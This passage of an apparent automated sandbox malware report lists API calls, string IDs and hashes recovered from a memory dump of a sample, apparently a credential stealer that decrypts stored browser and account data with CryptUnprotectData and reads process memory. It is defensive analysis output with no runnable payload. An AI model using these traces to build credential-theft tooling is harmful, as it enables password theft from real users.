                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1828521557-0
                                                                                                    • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                    • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 609303285-0
                                                                                                    • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                    • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2136311172-0
                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1936579350-0
                                                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                    • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3604893535-0
                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1213725291-0
                                                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                    • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                    • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                    • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                    APIs
                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
